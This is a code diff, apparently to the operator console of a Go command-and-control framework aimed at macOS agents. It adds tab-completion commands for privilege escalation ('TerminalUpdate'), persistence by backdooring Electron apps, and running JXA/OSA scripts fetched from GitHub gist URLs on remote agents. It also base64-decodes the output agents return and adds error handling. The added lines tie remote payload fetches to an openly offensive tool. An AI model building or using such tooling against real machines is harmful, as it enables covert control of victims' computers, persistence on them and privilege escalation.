| skipped 1 lines |
2 | 2 | | |
3 | 3 | | import ( |
4 | 4 | | "bytes" |
| 5 | + | "encoding/base64" |
5 | 6 | | "encoding/json" |
6 | 7 | | "fmt" |
7 | 8 | | "io" |
| skipped 90 lines |
98 | 99 | | readline.PcItemDynamic(listFiles(c2, agent)), |
99 | 100 | | ), |
100 | 101 | | readline.PcItem("upload"), |
| 102 | + | readline.PcItem("osa", |
| 103 | + | readline.PcItem("https://gist.githubusercontent.com/grines/d16db7b7a2cd18e6c2ee09b56643d87a/raw/7487b362b022092e826b3b9d11fbb01256733110/prompt.js"), |
| 104 | + | readline.PcItem("https://gist.githubusercontent.com/grines/6ffe50be47c6637dc718c03fa2f23a14/raw/7b907cbc61a77355448fd4baa4623051e7ef0cad/test.js"), |
| 105 | + | ), |
101 | 106 | | readline.PcItem("agent", |
102 | 107 | | readline.PcItemDynamic(listAgents(c2)), |
103 | 108 | | ), |
| skipped 9 lines |
113 | 118 | | readline.PcItem("cp", |
114 | 119 | | readline.PcItemDynamic(listFiles(c2, agent)), |
115 | 120 | | ), |
| 121 | + | readline.PcItem("privesc", |
| 122 | + | readline.PcItem("TerminalUpdate"), |
| 123 | + | ), |
| 124 | + | readline.PcItem("persist", |
| 125 | + | readline.PcItem("BackdoorElectron"), |
| 126 | + | ), |
| 127 | + | readline.PcItem("jxa", |
| 128 | + | readline.PcItem("https://gist.githubusercontent.com/grines/d16db7b7a2cd18e6c2ee09b56643d87a/raw/7487b362b022092e826b3b9d11fbb01256733110/prompt.js"), |
| 129 | + | readline.PcItem("https://gist.githubusercontent.com/grines/6ffe50be47c6637dc718c03fa2f23a14/raw/7b907cbc61a77355448fd4baa4623051e7ef0cad/test.js"), |
| 130 | + | ), |
116 | 131 | | ) |
117 | 132 | | l, err := readline.NewEx(&readline.Config{ |
118 | 133 | | Prompt: "\033[31m»\033[0m ", |
| skipped 12 lines |
131 | 146 | | |
132 | 147 | | log.SetOutput(l.Stderr()) |
133 | 148 | | if agent != "Not Connected" { |
134 | | - | wd := getAgentWorking(c2 + "/api/agent/" + agent) |
| 149 | + | wd, err := getAgentWorking(c2 + "/api/agent/" + agent) |
| 150 | + | if err != nil { |
| 151 | + | fmt.Println(err) |
| 152 | + | agent = "Not Connected" |
| 153 | + | l.SetPrompt(" <" + blue(agent) + "*> ") |
| 154 | + | } else { |
| 155 | + | l.SetPrompt(red(wd) + " <" + blue(agent) + "*> ") |
| 156 | + | } |
135 | 157 | | l.SetPrompt(red(wd) + " <" + blue(agent) + "*> ") |
136 | 158 | | } else { |
137 | 159 | | l.SetPrompt(" <" + blue(agent) + "*> ") |
| skipped 53 lines |
191 | 213 | | deadline := time.Now().Add(15 * time.Second) |
192 | 214 | | for { |
193 | 215 | | id, output := getOutput(c2+"/api/cmd/output/"+agent+"/"+cmdid, c2, cmdid) |
| 216 | + | sDec, _ := base64.StdEncoding.DecodeString(output) |
194 | 217 | | if id == cmdid && output != "" || cmdString == "" { |
195 | | - | fmt.Fprintln(os.Stderr, output) |
196 | | - | wd := getAgentWorking(c2 + "/api/agent/" + agent) |
| 218 | + | fmt.Fprintln(os.Stderr, string(sDec)) |
| 219 | + | wd, err := getAgentWorking(c2 + "/api/agent/" + agent) |
| 220 | + | if err != nil { |
| 221 | + | fmt.Println(err) |
| 222 | + | } |
197 | 223 | | l.SetPrompt(red(wd) + " <" + blue(agent) + "*> ") |
198 | 224 | | break |
199 | 225 | | } |
| skipped 9 lines |
209 | 235 | | deadline := time.Now().Add(15 * time.Second) |
210 | 236 | | for { |
211 | 237 | | id, output := getOutput(c2+"/api/cmd/output/"+agent+"/"+cmdid, c2, cmdid) |
| 238 | + | sDec, _ := base64.StdEncoding.DecodeString(output) |
212 | 239 | | if strings.Contains(output, "Location:") { |
213 | 240 | | parts := strings.Split(output, " ") |
214 | 241 | | path := parts[1] |
| skipped 2 lines |
217 | 244 | | //fmt.Println("Process Download" + file) |
218 | 245 | | } |
219 | 246 | | if id == cmdid && output != "" || cmdString == "" { |
220 | | - | fmt.Fprintln(os.Stderr, output) |
221 | | - | wd := getAgentWorking(c2 + "/api/agent/" + agent) |
| 247 | + | fmt.Fprintln(os.Stderr, string(sDec)) |
| 248 | + | wd, err := getAgentWorking(c2 + "/api/agent/" + agent) |
| 249 | + | if err != nil { |
| 250 | + | fmt.Println(err) |
| 251 | + | } |
222 | 252 | | l.SetPrompt(red(wd) + " <" + blue(agent) + "*> ") |
223 | 253 | | break |
224 | 254 | | } |
| skipped 132 lines |
357 | 387 | | |
358 | 388 | | } |
359 | 389 | | |
360 | | - | func getAgentWorking(url string) string { |
| 390 | + | func getAgentWorking(url string) (string, error) { |
361 | 391 | | |
362 | 392 | | resp, err := http.Get(url) |
| 393 | + | if err != nil { |
| 394 | + | return "", err |
| 395 | + | } |
363 | 396 | | if resp.Status == "200 OK" { |
364 | 397 | | |
365 | 398 | | if err != nil { |
| skipped 16 lines |
382 | 415 | | |
383 | 416 | | //fmt.Println(results.Working) |
384 | 417 | | |
385 | | - | return results.Working |
| 418 | + | return results.Working, err |
386 | 419 | | } |
387 | | - | return "False" |
| 420 | + | return "", err |
388 | 421 | | |
389 | 422 | | } |
390 | 423 | | |
| skipped 118 lines |